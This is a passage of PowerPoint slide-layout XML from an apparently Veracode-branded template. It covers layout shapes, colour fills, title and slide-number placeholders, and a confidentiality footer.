          <a:blip r:embed="rId2">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect r="-26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BA86D15-01B3-64D5-FB49-EF409664C355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4722471" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="53000">
                <a:schemeClr val="accent4">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40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chemeClr val="tx1"/>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tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791F8201-5505-FD72-A517-E9D1C9AC186A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4F7F73-1260-AFA2-0056-34EFDDCC319A}"/>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5" name="Freeform 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CEBAEE-1648-55E5-664C-BB54DE156F6B}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3673B87E-F35D-2951-53A6-CCF066C524EA}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE022A3A-1368-259A-0E03-2F09EDA3F880}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5648C2FE-501E-D625-5C16-26CBA697C8F1}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3212243629"/>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3_Content_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect r="-300000"/>
          </a:stretch>
        </a:blip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chemeClr val="accent5"/>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accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791F8201-5505-FD72-A517-E9D1C9AC186A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4F7F73-1260-AFA2-0056-34EFDDCC319A}"/>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5" name="Freeform 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CEBAEE-1648-55E5-664C-BB54DE156F6B}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3673B87E-F35D-2951-53A6-CCF066C524EA}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE022A3A-1368-259A-0E03-2F09EDA3F880}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5648C2FE-501E-D625-5C16-26CBA697C8F1}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A47EB06-F8C9-F007-E36D-27AC83DB78C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1945662299"/>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4_Content_Light_Title">
    <p:bg>
      <p:bgPr>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:lum/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect r="-49000"/>
          </a:stretch>
        </a:blip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chemeClr val="accent5"/>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accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{791F8201-5505-FD72-A517-E9D1C9AC186A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4F7F73-1260-AFA2-0056-34EFDDCC319A}"/>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5" name="Freeform 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CEBAEE-1648-55E5-664C-BB54DE156F6B}"/>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8" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3673B87E-F35D-2951-53A6-CCF066C524EA}"/>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9" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE022A3A-1368-259A-0E03-2F09EDA3F880}"/>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10" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5648C2FE-501E-D625-5C16-26CBA697C8F1}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84CE6B1-D886-6954-E4CB-066AAC0CFCE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="940078361"/>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_Light_Title_Center">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="FFFFFF"/>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="bg2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gra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p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{855A5A0B-B40B-D004-EC89-1EBDB555AE72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2637672803"/>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9_Break Slide Black A_01-Mask">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{061D0F22-AF7C-BBF8-4AB7-B37A26BA5E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="368510" y="307640"/>
            <a:ext cx="11454980" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12142035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0_Break Slide Black A_01-Mask">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A blue background with circles&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074C7D1-4EDC-60F0-3550-1AFE87B8C95E}"/>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6818"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="23000" contrast="12000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="59203" r="1598" b="1104"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="6096000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23041386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1_Break Slide Black A_01-Mask">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="F9FFFF"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A blue background with circles&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F074C7D1-4EDC-60F0-3550-1AFE87B8C95E}"/>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6818"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="23000" contrast="12000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="59203" r="1598" b="1104"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6096000" y="0"/>
            <a:ext cx="6096000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C49DBB88-6497-3E59-C6C9-A1B0D876E77F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
